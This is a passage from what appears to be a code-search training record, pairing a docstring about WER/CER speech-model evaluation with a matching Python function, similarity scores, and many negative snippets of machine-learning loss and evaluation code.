tf.reduce_sum(fore_loss)\n\n conf_loss = back_loss + fore_loss\n\n class_loss = tf.reduce_sum(obj * tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_prob, labels=gt_class))\n\n loss = coords_loss + conf_loss + class_loss\n\n return loss", "def get_contractive_loss(self):\n keys = list(self.head.state_dict().keys())\n W = Variable(self.head.state_dict()[keys[-2]])\n if torch.cuda.is_available():\n W = W.cuda()\n contractive_loss = torch.sum(W**2, dim=1).sum()\n return contractive_loss", "def loss(self,\n inputs: Union[Tensor, Tuple[Tensor]],\n batch_data_samples: OptSampleList,\n train_cfg: ConfigType = {}) -> dict:\n\n pred_outputs = self.forward(inputs)\n\n lifting_target_label = torch.cat([\n d.gt_instance_labels.lifting_target_label\n for d in batch_data_samples\n ])\n trajectory_weights = torch.cat([\n d.gt_instance_labels.trajectory_weights for d in batch_data_samples\n ])\n\n # calculate losses\n losses = dict()\n loss = self.loss_module(pred_outputs, lifting_target_label,\n trajectory_weights.unsqueeze(-1))\n\n losses.update(loss_traj=loss)\n\n # calculate accuracy\n _, avg_acc, _ = keypoint_pck_accuracy(\n pred=to_numpy(pred_outputs),\n gt=to_numpy(lifting_target_label),\n mask=to_numpy(trajectory_weights) > 0,\n thr=0.05,\n norm_factor=np.ones((pred_outputs.size(0), 3), dtype=np.float32))\n\n mpjpe_traj = torch.tensor(avg_acc, device=lifting_target_label.device)\n losses.update(mpjpe_traj=mpjpe_traj)\n\n return losses", "def loss(params: hk.Params, batch, label) -> jnp.ndarray:\r\n logits = net.apply(params, batch)\r\n labels = jax.nn.one_hot(label, n_classes)\r\n\r\n # Cross Entropy Loss\r\n softmax_xent = -jnp.sum(labels * jax.nn.log_softmax(logits))\r\n softmax_xent /= labels.shape[0]\r\n return softmax_xent", "def triplet_loss(y_true, y_pred):\n [a,p,n] = tf.unstack(y_pred, num=3)\n pos_dist = tf.reduce_sum((a - p)**2, axis=-1)\n neg_dist = tf.reduce_sum((a - n)**2, axis=-1)\n basic_loss = pos_dist - neg_dist + 0.1\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0.0)) \n return loss", "def cls_wrapper(target_labels, predicted_labels):\n # Find which targets contribute to the loss (targets with non-neutral labels)\n contributing_indices = tf.where(tf.not_equal(target_labels, -1))\n\n # Take contributing\n target_labels = tf.gather_nd(target_labels, contributing_indices)\n contributing_prediction = tf.gather_nd(predicted_labels, contributing_indices)\n\n # Compute loss\n res = function(target_labels,\n contributing_prediction)\n\n # Zero batch size case\n return 
K.switch(tf.size(res) > 0, K.mean(res), tf.constant(0.0))", "def score_eval_batch(datas,model):\n tf_eval_preds_batch = []\n\n for i in range(len(datas.eval_batchs)):\n tf_eval_preds, _ = model.run(datas=datas, mode=model.inf_signal, batch_id=i)\n tf_eval_preds_batch.append(tf_eval_preds)\n tf_eval_preds = np.concatenate(tf_eval_preds_batch)\n\n y_nz = [sum(x) > 0 for x in datas.target]\n y_nz = np.arange(datas.target.shape[0])[y_nz]\n\n preds_all = tf_eval_preds[y_nz, :]\n y = datas.target[y_nz, :]\n\n x = scipy.sparse.lil_matrix(y.shape)\n x.rows = preds_all\n x.data = np.ones_like(preds_all)\n x = x.toarray()\n\n z = x * y\n return np.mean(np.divide((np.sum(z, 1)), np.sum(y, 1)))", "def cross_entropy(self, yhat):\n n = len(self._y)\n c = 0.0\n for i in range(0, n):\n c += self._y[i] * log(\n yhat[i]) + (1 - self._y[i]) * log(1 - yhat[i])\n\n return c", "def valid_loss(model, data):\n c = Counter()\n for item in data.iter_valid_batches():\n inp, out_v, out_prev_t, out_t = item\n cost, cost_t, cost_v = model.loss_test(inp, out_v, out_prev_t, out_t)\n c += Counter({'cost_t': cost_t, 'cost_v': cost_v, 'cost': cost, 'N': 1})\n return c", "def eval_func(batched_data, model):\n \n # This function uses a model to compute predictions on data coming in batches.\n # Then it calculates the accuracy of predictions with respect to the gold labels.\n correct = 0\n total = 0\n predicted = None\n gold_label = None\n\n # Initialize the confusion matrix\n nb_classes = 20\n confusion_matrix = torch.zeros(nb_classes, nb_classes)\n\n with torch.no_grad():\n # Iterating over all batches (can be 1 batch as well):\n for n, (input_data, gold_label) in enumerate(batched_data):\n out = model(input_data)\n predicted = out.argmax(1)\n correct += len((predicted == gold_label).nonzero())\n total += len(gold_label)\n # Update the confusion matrix\n for i in range(len(predicted)):\n confusion_matrix[predicted[i], gold_label[i]] += 1\n accuracy = correct / total\n\n return accuracy, predicted, gold_label, confusion_matrix", "def add_pred_op(self):\n if not self.config.use_crf:\n self.labels_pred = tf.cast(tf.argmax(self.logits, axis=-1),\n tf.int32)" ]
[ "0.7081912", "0.70582753", "0.6970499", "0.6948209", "0.69290686", "0.68720865", "0.6859095", "0.67881185", "0.65927947", "0.6434992", "0.6425474", "0.64251554", "0.6351377", "0.6332072", "0.619035", "0.6178352", "0.61739546", "0.6164014", "0.61629915", "0.61627495", "0.6115041", "0.6095366", "0.6074938", "0.60625374", "0.6042776", "0.60398203", "0.6036722", "0.6028721", "0.6024012", "0.6009784", "0.5995585", "0.5960501", "0.59590745", "0.59470224", "0.5930522", "0.592899", "0.59260863", "0.5920267", "0.5919828", "0.5916961", "0.59060675", "0.5885409", "0.5877196", "0.5873153", "0.58642006", "0.5855486", "0.585128", "0.5839608", "0.58322656", "0.58247674", "0.581662", "0.5815757", "0.5807546", "0.5770715", "0.57663715", "0.5763341", "0.57609534", "0.5735404", "0.57320285", "0.5729884", "0.5724366", "0.5720391", "0.5702535", "0.5698871", "0.5698221", "0.56968594", "0.5694749", "0.5693408", "0.56868654", "0.5686861", "0.568283", "0.5678756", "0.56777596", "0.5674204", "0.56721956", "0.5665529", "0.565644", "0.56555676", "0.56480765", "0.5643254", "0.56329167", "0.5632544", "0.56271434", "0.5624069", "0.5609491", "0.56092674", "0.55846685", "0.55843043", "0.55797696", "0.55786437", "0.55733204", "0.55713356", "0.55637354", "0.5559621", "0.555721", "0.5554608", "0.55525506", "0.554928", "0.55452436", "0.5544179" ]
0.68982947
5
Evaluate the model performance using WER and CER as metrics.
def evaluate_model(estimator: es.Estimator, speech_labels: List[str], entries, input_fn_eval) -> Dict[str, float]: # Get predictions predictions = estimator.predict(input_fn=input_fn_eval) # Get probabilities of each predicted class probs = [pred["probabilities"] for pred in predictions] num_of_examples = len(probs) targets = [entry[1] for entry in entries] # The ground truth transcript total_wer, total_cer = 0., 0. greedy_decoder = decoder.DeepSpeechDecoder(speech_labels, blank_index=28) for prob, target in zip(probs, targets): decode = greedy_decoder.decode(prob) total_cer += greedy_decoder.cer(decode, target) total_wer += greedy_decoder.wer(decode, target) total_cer /= num_of_examples total_wer /= num_of_examples global_step = estimator.get_variable_value(tf.GraphKeys.GLOBAL_STEP) eval_results = { _WER_KEY: total_wer, _CER_KEY: total_cer, tf.GraphKeys.GLOBAL_STEP: global_step } return eval_results
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate(model, train_corpus, test_coprus, vocab=idx2word,\r\n num_docs_test=num_docs_test, tc=tc, td=td,\r\n eval_batch_size=_eval_batch_size,\r\n vocab_size=vocab_size,\r\n bow_norm=bow_norm):\r\n\r\n model.eval() # set model in evaluation mode\r\n with torch.no_grad():\r\n indices = torch.split(torch.tensor(range(num_docs_test)), eval_batch_size)\r\n\r\n ## get \\beta here\r\n beta = model.get_beta()\r\n\r\n ### do dc and tc here\r\n acc_loss = 0\r\n cnt = 0\r\n\r\n for idx, ind in enumerate(indices):\r\n data_batch = get_batch(test_corpus, ind, vocab_size, device)\r\n sums = data_batch.sum(1).unsqueeze(1)\r\n if bow_norm:\r\n normalized_data_batch = data_batch / sums\r\n else:\r\n normalized_data_batch = data_batch\r\n\r\n ## get theta\r\n theta, _ = model.get_theta(normalized_data_batch)\r\n ## get prediction loss\r\n res = torch.mm(theta, beta)\r\n preds = torch.log(res)\r\n recon_loss = -(preds * data_batch).sum(1)\r\n loss = recon_loss / sums.squeeze()\r\n loss = loss.mean().item()\r\n acc_loss += loss\r\n cnt += 1\r\n\r\n # Calculate final loss\r\n cur_loss = acc_loss / cnt\r\n ppl_dc = round(math.exp(cur_loss), 1)\r\n print('Eval Doc Completion PPL: {}'.format(ppl_dc))\r\n\r\n if tc or td: # calculate topic coherence or topic diversity\r\n beta = beta.data.cpu().numpy()\r\n if tc:\r\n print('Computing topic coherence...')\r\n utils.get_topic_coherence(beta, train_corpus, vocab)\r\n if td:\r\n print('Computing topic diversity...')\r\n utils.get_topic_diversity(beta, 25)\r\n return ppl_dc", "def evaluate(m, source, tc=False, td=False):\n\n m.eval()\n with torch.no_grad():\n if source == 'val':\n indices = torch.split(torch.tensor(range(args.num_docs_valid)), args.eval_batch_size)\n tokens = valid_tokens\n counts = valid_counts\n else: \n indices = torch.split(torch.tensor(range(args.num_docs_test)), args.eval_batch_size)\n tokens = test_tokens\n counts = test_counts\n\n\n ### do dc and tc here\n acc_loss = 0\n cnt = 0\n\n # Get parameter given econ variables \n theta = model.get_theta(econ_test)\n beta = model.get_beta()\n\n \n # Get prediction loss given the text \n normalized_data_batch, data_batch = batch(vocab_size, args.num_docs_test, test_tokens, test_counts, device)\n \n sums_2 = data_batch.sum(1).unsqueeze(1)\n res = torch.mm(theta, beta)\n preds = torch.log(res)\n recon_loss = -(preds * data_batch).sum(1)\n \n loss = recon_loss / sums_2.squeeze()\n loss = loss.mean().item()\n acc_loss += loss\n cnt += 1\n \n \n cur_loss = acc_loss / cnt\n ppl_dc = round(math.exp(cur_loss), 1)\n print('*'*100)\n print('{} Doc Completion PPL: {}'.format(source.upper(), ppl_dc))\n print('*'*100)\n if tc or td:\n beta = beta.data.cpu().numpy()\n if tc:\n print('Computing topic coherence...')\n get_topic_coherence(beta, train_tokens, vocab)\n if td:\n print('Computing topic diversity...')\n get_topic_diversity(beta, 25)\n return ppl_dc", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. 
Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def evaluate(cfg: DictConfig):\n\n experiments = cfg.get('experiment_type', f'{cfg.model.name}_only')\n fixed_t0 = cfg.get('fixed_t0', False)\n ext = '_fixedT0' if fixed_t0 else ''\n\n base_dir = cfg.device.root\n datasource = cfg.datasource.name\n\n if experiments == 'ablations':\n models = {\n 'FluxRGNN': ['final',\n 'final_without_encoder',\n 'final_without_boundary'],\n 'LocalLSTM': ['final']\n }\n elif experiments == 'final':\n models = {\n 'FluxRGNN': ['final'],\n 'GAM': ['final'],\n 'HA': ['final'],\n 'GBT': ['final']\n }\n else:\n m = cfg.model.name\n year = cfg.datasource.test_year\n\n # find all experiments available for this model, datasource and test year\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{year}')\n models = {\n m : [ f.name for f in os.scandir(result_dir) if f.is_dir() ]\n }\n\n\n # thresholds for binary classification metrics\n if cfg.datasource.name == 'abm':\n thresholds = [0.0019, 0.0207]\n else:\n thresholds = [0, 10, 20]\n\n rmse_per_hour = []\n mae_per_hour = []\n pcc_per_hour = []\n bin_per_hour = []\n\n rmse_per_night = []\n mae_per_night = []\n\n output_dir = osp.join(base_dir, 'results', datasource, f'performance_evaluation{ext}', experiments)\n os.makedirs(output_dir, exist_ok=True)\n\n counter = 0\n\n for m, dirs in models.items():\n print(f'evaluate {m}')\n\n for d in dirs:\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{cfg.datasource.test_year}', d)\n\n # check if directory exists\n if os.path.isdir(result_dir):\n results, model_cfg = load_cv_results(result_dir, trials=cfg.task.repeats, ext=ext)\n\n df_prep = pd.read_csv(osp.join(base_dir, 'data', 'preprocessed',\n f'{model_cfg[\"t_unit\"]}_{model_cfg[\"model\"][\"edge_type\"]}_ndummy={model_cfg[\"datasource\"][\"n_dummy_radars\"]}',\n datasource, cfg.season, str(cfg.datasource.test_year), 'dynamic_features.csv'))\n tidx2night = dict(zip(df_prep.tidx, df_prep.nightID))\n\n rmse_per_hour.append(compute_rmse(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n mae_per_hour.append(compute_mae(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n pcc_per_hour.append(compute_pcc(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n\n if fixed_t0:\n rmse_per_night.append(compute_rmse_per_night(m, d, 
results, tidx2night, groupby=['night_horizon', 'trial']))\n mae_per_night.append(compute_mae_per_night(m, d, results, tidx2night, groupby=['night_horizon', 'trial']))\n\n # compute binary classification measures\n for thr in thresholds:\n bin_per_hour.append(compute_bin(m, d, results, groupby=['horizon', 'trial'], threshold=thr, km2=True))\n\n counter += 1\n\n else:\n print(f'Experiment \"{d}\" for model \"{m}\" and datasource \"{datasource}\" is not available. '\n f'Use \"run_experiments.py model={m} datasource={datasource} +experiment={d}\" to run this experiment.')\n\n if counter > 0:\n rmse_per_hour = pd.concat(rmse_per_hour)\n rmse_per_hour.to_csv(osp.join(output_dir, f'rmse_per_hour.csv'))\n\n mae_per_hour = pd.concat(mae_per_hour)\n mae_per_hour.to_csv(osp.join(output_dir, f'mae_per_hour.csv'))\n\n pcc_per_hour = pd.concat(pcc_per_hour)\n pcc_per_hour.to_csv(osp.join(output_dir, f'pcc_per_hour.csv'))\n\n bin_per_hour = pd.concat(bin_per_hour)\n bin_per_hour.to_csv(osp.join(output_dir, f'bin_per_hour.csv'))\n\n if fixed_t0:\n rmse_per_night = pd.concat(rmse_per_night)\n rmse_per_night.to_csv(osp.join(output_dir, f'rmse_per_night.csv'))\n\n mae_per_night = pd.concat(mae_per_night)\n mae_per_night.to_csv(osp.join(output_dir, f'mae_per_night.csv'))", "def compute(self) -> None:\n \n self.model.eval()\n \n with torch.no_grad():\n for (input, target, _) in self.loader:\n\n # self.model = self.model.train(False) # TEST @lacoupe\n output, _ = self.model(input)\n \n output = (output >= 0.5)\n \n for out, tar in zip(output, target):\n \n tar = bool(tar)\n \n if out and tar:\n self.confusion['true_positive'] += 1\n elif not out and not tar:\n self.confusion['true_negative'] += 1\n elif out and not tar:\n self.confusion['false_positive'] += 1\n elif not out and tar:\n self.confusion['false_negative'] += 1\n \n self.accuracy = (self.confusion['true_positive'] + self.confusion['true_negative']) \\\n / sum(list(self.confusion.values()))\n \n if (self.confusion['true_positive'] + self.confusion['false_positive']) == 0.:\n self.precision = 0.\n else:\n self.precision = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_positive'])\n \n if (self.confusion['true_positive'] + self.confusion['false_negative']) == 0.:\n self.recall = 0.\n else:\n self.recall = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_negative'])\n \n if (self.precision + self.recall) == 0.:\n self.f1_score = 0.\n else:\n self.f1_score = 2 * self.precision * self.recall / (self.precision + self.recall)", "def evaluate(self) -> Dict[str, float]:\n eval_dataloader = self.get_eval_dataloader()\n\n output = self._prediction_loop(eval_dataloader, description=\"Evaluation\")\n return output.metrics", "def evaluate_model(model, X_test, Y_test, category_names):\n\n print(\"Testing Performance\")\n print(classification_report(Y_test, model.predict(X_test), target_names=category_names))\n\n #Todo cat names", "def _evaluate(self):\n coherence = gensim.models.coherencemodel.CoherenceModel(model=self.ldamodel,\n corpus=self.gensim_corpus,\n dictionary=self.ldamodel.id2word,\n coherence='u_mass')\n self.score = coherence.get_coherence()\n if self.verbose:\n print('LDA achieved a coherence (u_mass) of: ', self.score)", "def run(self):\n params = self.params\n\n # load data\n self.data = self.load_data()\n # check if loaded classification data set is using the same dict as pretrained model\n if not self.data['dico'] == self._embedder.dico:\n 
self.compare_dict(self.data['dico'], self._embedder.dico)\n raise Exception((\"Dictionary in evaluation data (%i words) seems different than the one \" +\n \"in the pretrained model (%i words). Please verify you used the same dictionary, \" +\n \"and the same values for max_vocab and min_count.\") % (len(self.data['dico']),\n len(self._embedder.dico)))\n\n # embedder\n self.encoder = copy.deepcopy(self._embedder)\n self.encoder.cuda()\n\n # projection layer: CHANGE 3 to your number of classes output\n self.proj = nn.Sequential(*[\n nn.Dropout(params.dropout),\n nn.Linear(self.encoder.out_dim, params.clf_output_dim)\n ]).cuda()\n\n # optimizers: use different optimizers to tune embedding layer and projection layer\n self.optimizer_e = get_optimizer(list(self.encoder.get_parameters(params.finetune_layers)), params.optimizer_e)\n self.optimizer_p = get_optimizer(self.proj.parameters(), params.optimizer_p)\n best_acc = 0\n eval_metric = \"CLF_valid_en_acc\"\n # train and evaluate the model\n for epoch in range(params.n_epochs):\n # update epoch\n self.epoch = epoch\n\n # training\n logger.info(\"CLF - Training epoch %i ...\" % epoch)\n self.train()\n\n # evaluation\n logger.info(\"CLF - Evaluating epoch %i ...\" % epoch)\n with torch.no_grad():\n scores = self.eval()\n if scores[eval_metric] > best_acc:\n logger.info('New best score for %s: %.6f' % (eval_metric, scores[eval_metric]))\n self.save_checkpoint('best-%s' % eval_metric)\n self.decrease_counts = 0\n best_acc = scores[eval_metric]\n else:\n logger.info(\"Not a better validation score (%i / %i).\"\n % (self.decrease_counts, self.decrease_counts_max))\n self.decrease_counts += 1\n if self.decrease_counts > self.decrease_counts_max:\n logger.info(\"Stopping criterion has been below its best value for more \"\n \"than %i epochs. 
Ending the experiment...\" % self.decrease_counts_max)\n exit()\n self.scores.update(scores)", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def mgcEval(self):\n import numpy as np\n def report_to_df(report):\n\n \"\"\"\n function to convert classification report to dataframe (for visualisation plot)\n \"\"\"\n\n report = re.sub(r\" +\", \" \", report).replace(\"avg / total\", \"avg/total\").replace(\"\\n \", \"\\n\")\n # update this due to sklearn classification report output change\n report = re.sub(r\" +\", \" \", report).replace(\"micro avg\", \"micro_avg\").replace(\"macro avg\", \"macro_avg\").replace(\"weighted avg\", \"weighted_avg\").replace(\"\\n \", \"\\n\")\n report_df = pd.read_csv(StringIO(\"Classes\" + report), sep=' ', index_col=0) \n return(report_df)\n \n #txt report to df\n class_rpttop1 = classification_report(self.y_true, self.y_pred)\n df_report = report_to_df(class_rpttop1)\n\n df_report = df_report.iloc[:self.nb_classes, :].copy()\n df_report.index = df_report.index.astype(int)\n \n\n # classifier prediction metrics\n def classMetrics(averagex):\n precision, recall, fscore, support = score(self.y_true, self.y_pred, average=averagex)\n \n return(\n print(''), \n print('-------------{0:}--------------------'.format(averagex)), \n print('precision: {0:.4f}'.format(precision)),\n print('recall: {0:.4f}'.format(recall)),\n print('fscore: {0:.4f}'.format(fscore)),\n print(''),\n print('kappa score: {0:.4f}'.format(cohen_kappa_score(self.y_true, self.y_pred))),\n print('accuracy score: {0:.4f}'.format(accuracy_score(self.y_true, self.y_pred))))\n \n def predSamp():\n\n correct = np.nonzero(self.y_pred==self.y_true)[0]\n incorrect = np.nonzero(self.y_pred!=self.y_true)[0]\n\n # quick check of the number of correct prediction from validation set\n print(\"\")\n print(\"correct/total = {0: .4f}\".format(len(correct)/(len(correct)+len(incorrect))))\n print(\"total correct sample = {0: .0f}\".format(len(correct)))\n print('------------------------------------------------------------------')\n \n def classReport():\n print('----------------------------- Classfication Report -------------------------------')\n print(classification_report(pd.Series(self.y_true).map(self.dict_label), pd.Series(self.y_pred).map(self.dict_label)))\n \n self.class_rpt = pd.concat([pd.DataFrame(pd.Series(df_report.index.tolist()).map(self.dict_label), columns = ['label']), df_report], axis = 1)\n \n self.classMetricsMac = classMetrics(\"macro\")\n self.classMetricsMic = classMetrics(\"micro\")\n self.predSample = predSamp()\n self.class_rptTop1 = classReport()\n \n return self", "def compute_objectives(self, predictions, batch, stage):\n\n p_ctc, wav_lens = predictions\n\n ids = batch.id\n tokens_eos, tokens_eos_lens = batch.tokens_eos\n tokens, tokens_lens = batch.tokens\n\n loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)\n\n if stage != sb.Stage.TRAIN:\n # Decode token terms to words\n sequence = sb.decoders.ctc_greedy_decode(\n p_ctc, wav_lens, blank_id=self.hparams.blank_index\n )\n\n predicted_words = self.tokenizer(sequence, task=\"decode_from_list\")\n\n # Convert indices to words\n target_words = undo_padding(tokens, tokens_lens)\n target_words = self.tokenizer(target_words, task=\"decode_from_list\")\n\n 
self.wer_metric.append(ids, predicted_words, target_words)\n self.cer_metric.append(ids, predicted_words, target_words)\n\n return loss", "def evaluate(model: torch.nn.Module, dataloader: torch.utils.data.DataLoader, show_progress: bool = True,\n device: torch.device = torch.device('cuda:0')):\n with torch.no_grad():\n model.to(device=device)\n sum_cross_entropy = torch.nn.BCEWithLogitsLoss(reduction='sum').to(device=device)\n scoring_loss = 0.\n scoring_predictions = []\n scoring_labels = []\n for scoring_data in tqdm(dataloader, total=len(dataloader), desc=\"Evaluating model\",\n disable=not show_progress, position=1):\n \n # Get samples as lists\n labels, inputs, sequence_lengths, counts_per_sequence, sample_ids = scoring_data\n \n # Apply attention-based sequence reduction and create minibatch\n labels, inputs, sequence_lengths, n_sequences = model.reduce_and_stack_minibatch(\n labels, inputs, sequence_lengths, counts_per_sequence)\n \n # Compute predictions from reduced sequences\n logit_outputs = model(inputs, n_sequences)\n prediction = torch.sigmoid(logit_outputs)\n \n # Compute mean of losses on-the-fly\n scoring_loss += sum_cross_entropy(logit_outputs, labels[..., -1]) / len(dataloader.dataset)\n \n # Store predictions and labels\n scoring_predictions.append(prediction)\n scoring_labels.append(labels[..., -1])\n \n # Compute BACC, F1, and AUC score\n scoring_predictions = torch.cat(scoring_predictions, dim=0).float()\n scoring_predictions_threshold = (scoring_predictions > 0.5).float()\n scoring_labels = torch.cat(scoring_labels).float()\n \n scoring_labels = scoring_labels.cpu().numpy()\n scoring_predictions = scoring_predictions.cpu().numpy()\n scoring_predictions_threshold = scoring_predictions_threshold.cpu().numpy()\n \n roc_auc = metrics.roc_auc_score(scoring_labels, scoring_predictions, average=None)\n bacc = metrics.balanced_accuracy_score(y_true=scoring_labels, y_pred=scoring_predictions_threshold)\n f1 = metrics.f1_score(y_true=scoring_labels, y_pred=scoring_predictions_threshold, average='binary',\n pos_label=1)\n return roc_auc, bacc, f1, scoring_loss", "def evaluate(self):\n\n\t\tself.model_score = self.model.evaluate(self.x_test, self.y_test, batch_size=2048)\n\t\tprint(\"%s score = %f\\n\" %(self.modelName, self.model_score[1]))\n\t\treturn self.model_score", "def evaluate(data_loader, model, device):\n\n\tmodel.eval()\n\ttotal_num_examples = 0\n\ttotal_error = 0\n\tfor idx, batch in enumerate(data_loader):\n\t\tquestion_feature_vec = batch['feature_vec'].to(device)\n\t\tquestion_len = batch['len'].to(device)\n\t\tlabels = batch['labels'].to(device)\n\n\t\t####Your code here ---\n\n\t\t# get the output from the model\n\t\tlogits = model(question_feature_vec, question_len)\n\n\t\t# get error, num_examples using accuracy_fn defined previously\n\t\terror, num_examples = accuracy_fn(logits, labels)\n\n\t\t# update total_error and total_num_examples\n\t\ttotal_error += error\n\t\ttotal_num_examples += num_examples\n\n\taccuracy = 1 - total_error / total_num_examples\n\treturn accuracy", "def test_evaluate():\n X_train, X_test, y_train, y_test = src.load()\n clf, score = src.train(X_train, y_train)\n test_score = src.evaluate(clf, X_test, y_test)\n assert isinstance(test_score, float)", "def evaluate_model(model, eval_path):\n with msg.loading(f\"Loading model '{model}'...\"):\n nlp = spacy.load(model)\n data, _ = format_data(srsly.read_jsonl(eval_path))\n sc = nlp.evaluate(data)\n result = [\n (\"Precision\", f\"{sc.ents_p:.3f}\"),\n (\"Recall\", 
f\"{sc.ents_r:.3f}\"),\n (\"F-Score\", f\"{sc.ents_f:.3f}\"),\n ]\n msg.table(result)", "def run_eval(gt_anno, pred_anno):\n coco = COCO(gt_anno)\n coco_dets = coco.loadRes(pred_anno)\n coco_eval = COCOeval(coco, coco_dets, \"keypoints\")\n coco_eval.evaluate()\n coco_eval.accumulate()\n coco_eval.summarize()\n coco_eval = COCOeval(coco, coco_dets, \"bbox\")\n coco_eval.evaluate()\n coco_eval.accumulate()\n coco_eval.summarize()", "def evaluate(model, X, y):\n\tmodel.eval()\n\n\t# make the predictions\n\ty_hat = predict(model,X)\n\n\t# convert to cpu\n\ty_hat = y_hat.detach().cpu()\n\ty = y.detach().cpu()\n\n\t# compute evaluation metrics\n\taccuracy = accuracy_score(y, y_hat)\n\tprf \t = precision_recall_fscore_support(y, y_hat, labels=[0,1], average='macro')\n\n\treturn accuracy, prf", "def evaluate(self, warning=True, store=True):\n # Calculate and report our model's accuracy.\n accuracy = self.learner.score(self.all_data, self.all_labels)\n\n # Find model predictions\n self.y_preds = self.learner.predict(self.all_data)\n\n # Calculated confusion matrix\n cm = confusion_matrix(self.all_labels, self.y_preds)\n\n # To prevent nan value for precision, we set it to 1 and send out a warning message\n if cm[1][1] + cm[0][1] != 0:\n precision = cm[1][1] / (cm[1][1] + cm[0][1])\n else:\n precision = 1.0\n if warning:\n print('WARNING: zero division during precision calculation')\n\n recall = cm[1][1] / (cm[1][1] + cm[1][0])\n true_negative = cm[0][0] / (cm[0][0] + cm[0][1])\n bcr = 0.5 * (recall + true_negative)\n\n if store:\n self.store_metrics_to_model(cm, accuracy, precision, recall, bcr)", "def evaluate(self, ts_loader=None):\n # start evaluation of the model\n self.tr_model.eval()\n samples, correct = 0, 0\n \n # check if a dataloader was provided for evaluation\n loader = self.ts_loader if not ts_loader else ts_loader\n \n with torch.no_grad():\n for x, y in loader:\n \n x, y = x.to(device), y.to(device)\n \n y_ = self.tr_model(x)\n _, predicted = torch.max(y_.detach(), 1)\n \n samples += y.shape[0]\n correct += (predicted == y).sum().item()\n \n # return evaluation statistics\n return {\"accuracy\" : correct/samples}", "def eval(self):\n\n # parameters initialize\n torch = import_optional_dependency(\"torch\")\n eval_total = 0\n eval_correct = 0\n eval_loss = 0\n self._set_eval()\n\n # display the information\n if self.info:\n print(f\"\\rEvaluating...\", end=\"\")\n\n # start eval part\n for i, (source, target) in enumerate(self.eval_dataset):\n # send data to device\n source = source.to(self.device)\n target = target.to(self.device)\n\n result = self.model(source)\n eval_loss += self.criterion(result, target).item()\n _, predicted = torch.max(result.data, 1)\n eval_total += target.size(0)\n eval_correct += (predicted == target).sum().item()\n\n accuracy = eval_correct / eval_total\n eval_loss = eval_loss / eval_total\n\n if self.info:\n print(f\"\\rEvaluation loss: { eval_loss } | Accuracy: { accuracy }\")\n\n return eval_loss, accuracy", "def evaluate(self, data: ExchangeObject, extra: dict | None = None) -> ExchangeObject:\n self._set_cuda_device()\n\n if extra is None:\n extra = {}\n if not isinstance(data, ExchangeObject):\n raise ValueError(f\"expected data to be ExchangeObject but received {type(data)}\")\n\n if self.evaluator is None:\n raise ValueError(\"self.evaluator should not be None.\")\n if self.pre_filters is not None:\n for _filter in self.pre_filters:\n data = _filter(data, extra)\n\n self.phase = FlPhase.EVALUATE\n self.logger.info(f\"Load {self.client_name} 
weights...\")\n local_var_dict = get_state_dict(self.evaluator.network)\n global_weights, n_converted = convert_global_weights(\n global_weights=cast(dict, data.weights), local_var_dict=local_var_dict\n )\n self._check_converted(data.weights, local_var_dict, n_converted)\n\n _, updated_keys, _ = copy_model_state(src=global_weights, dst=self.evaluator.network)\n if len(updated_keys) == 0:\n self.logger.warning(\"No weights loaded!\")\n self.logger.info(f\"Start {self.client_name} evaluating...\")\n if isinstance(self.trainer, Trainer):\n self.evaluator.run(self.trainer.state.epoch + 1)\n else:\n self.evaluator.run()\n return_metrics = ExchangeObject(metrics=self.evaluator.state.metrics)\n\n if self.post_evaluate_filters is not None:\n for _filter in self.post_evaluate_filters:\n return_metrics = _filter(return_metrics, extra)\n return return_metrics", "def test_evaluate(self):\n # Check build does not raise errors\n dataset = KDDCupDataset()\n dataset.create_fixed_samples(\n *self.data, samples_num=1, partition_sizes=self.partition_sizes)\n dataset.set_current_sample(0)\n model = self.MODEL(dataset, **self.model_arguments)\n model.fit(training_epochs=50)\n metric = model.evaluate('test')\n self.assertLessEqual(0, metric)\n self.assertGreaterEqual(1, metric)", "def evaluate_performance(data_loader, model):\n acc = mx.metric.Accuracy()\n\n for idx, (data, label) in enumerate(data_loader):\n data = data.as_in_context(model.ctx)\n label = label.as_in_context(model.ctx)\n pred = model(data)\n pred = mx.nd.argmax(pred, axis=1)\n 